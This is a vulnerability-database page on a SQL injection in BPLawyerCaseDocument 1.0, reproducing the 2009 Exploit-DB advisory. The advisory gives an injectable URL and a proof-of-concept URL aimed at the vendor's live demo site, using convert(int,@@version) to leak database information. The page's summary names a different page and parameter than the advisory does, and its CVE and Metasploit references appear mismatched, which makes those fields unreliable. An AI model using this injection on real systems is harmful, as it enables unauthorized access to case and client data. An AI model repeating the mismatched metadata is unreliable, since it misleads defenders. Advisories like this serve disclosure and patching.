BPLawyerCaseDocument 1.0 MSSQL Vulnerabilities

vendor:

BPLawyerCaseDocument

by:

OoN_Boy

8.5

CVSS

HIGH

SQL Injection

CWE

Product Name: BPLawyerCaseDocument

Affected Version From: 1

Affected Version To: 1

Patch Exists: YES

Related CWE: CVE-2009-4010

CPE: cpe:a:bpowerhouse:bplawyercasedocument:1.0

Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-4010/, https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-4010/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

BPLawyerCaseDocument 1.0 MSSQL Vulnerabilities

BPLawyerCaseDocument 1.0 is vulnerable to SQL injection. This can be exploited to gain access to the database. The vulnerability is located in the "CaseID" parameter in the "CaseDetails.aspx" page. Input passed to the "CaseID" parameter is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation of this vulnerability requires authentication. This vulnerability is confirmed in version 1.0. Other versions may also be affected.

Mitigation:

Upgrade to the latest version of BPLawyerCaseDocument.

Source

Exploit-DB raw data:

[x]========================================================================================================================================[x]
 |                                                      AntiSecurity[dot]org                                                                |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Title    		: BPLawyerCaseDocument 1.0 MSSQL Vulnerabilities								    |
 | Software 		: BPLawyerCaseDocument												    |
 | Vendor   		: http://bpowerhouse.info											    |
 | Demo			: http://www.bpowerhouse.info/BPLawyerCaseDocuments								    |
 | Date    		: 22 September 2009 ( Indonesia )										    |
 | Author   		: OoN_Boy													    |
 | Contact  		: oon.boy9@gmail.com												    |
 | Web	    		: http://oonboy.info												    |
 | Blog     		: http://oonboy.blogspot.com											    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Technology		: ASP.NET 2.0                                                                                                       |
 | Database		: MSSQL 2005                                                                                                        |
 | Version		: 1.0         		                                                                                            |
 | License		: GNU GPL                                                                                                           |
 | Price		: $29.00                                                                                                            |
 | Description		: Is a script where lawyers can manage cases and deal with case documents in an easy way. The script allows	    |
 |			  attorneys and law offices to manage and view case documents. It includes an agent panel where agents can login and|
 |			  manage clients information and includes an administrator panel where site administrator can have control of all   |
 |			  Data														    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Google Dork 		: cari sendiri yah :)												    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Exploit 		: http://localhost/[path]/employee.aspx?cat=[sql]				 	 			    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Proof of concept	: http://www.bpowerhouse.info/BPLawyerCaseDocuments/employee.aspx?cat=1+and+1=convert(int,@@version)--		    |
 |			  you must login for test											    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Greetz		: antisecurity.org batamhacker.or.id                                                                                |
 |		 	  Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va                       |
 | 		  	  k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere                  |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Note			: Selamat hariraya idul fitri mohon maaf lahir dan batin, maafin kesalahan ku selama ini yah all :)		    |
 |			  kabur.... untuk sementara waktu.... bye bye.....								    |
[x]========================================================================================================================================[x]